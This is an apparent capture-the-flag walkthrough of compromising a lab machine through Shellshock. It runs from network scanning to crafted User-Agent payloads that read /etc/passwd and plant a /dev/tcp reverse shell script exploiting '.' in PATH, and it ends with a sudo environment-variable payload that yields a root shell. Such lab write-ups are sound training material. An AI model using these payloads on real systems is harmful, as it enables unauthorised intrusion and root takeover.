• netdiscover
  • Nmap
  • Nikto
  • User Agent Switcher


Use netdiscover to detect target IP address

netdiscover -i eth0 -r is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 -p-

port 591 is opening, looks like it is running http service.

use nikto to scan

nikto -h

nothing cool.

Use wufzz to scan

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 2>/dev/null

find an interesting path cgi-bin. Thats interesting, because it reminds shellshock.

Use brower to check the web page

The web page shows result of commands netstat and iostat.

check the source code find the cgi path /cgi-bin/cat

start to verfiy shellshock:

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" ""

Confirmed.Also find two user names bynarr and apophis

I tried to upload reverse shell

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/bash -i > /dev/tcp/ 0<&1" ""

failed. I guess because certain ports are allowed.

keep going…

check the files belong to bynarr:

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /usr/bin/find / -user bynarr " ""

Try to read each file I got, and find the va/spool/mail/bynarr is very interesting.

so now I know I can only use port 51242 to setup reverse shell.

Also I noticed that . is in environment variable $PATH, so that I can run a script in the current path firstly.

write the reverse shell to iostat:

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/echo -e '#/bin/bash -i >& /dev/tcp/ 0>&1' > /home/bynarr/iostat" ""

add the x attribute

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/chmod +x /home/bynarr/iostat" ""

After serverl seconds I got shell:

next run sudo -l to check allowed commands for bynarr

so /home/bynarr/lime which is owned by root that bynarr can run.

in order to check shell shock locally. run:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

local shell shock works

from the sudo -l output, there are many environment variables can be used. I ued USERNAME

sudo USERNAME='() { :;}; /bin/bash' /home/bynarr/lime

get the shell: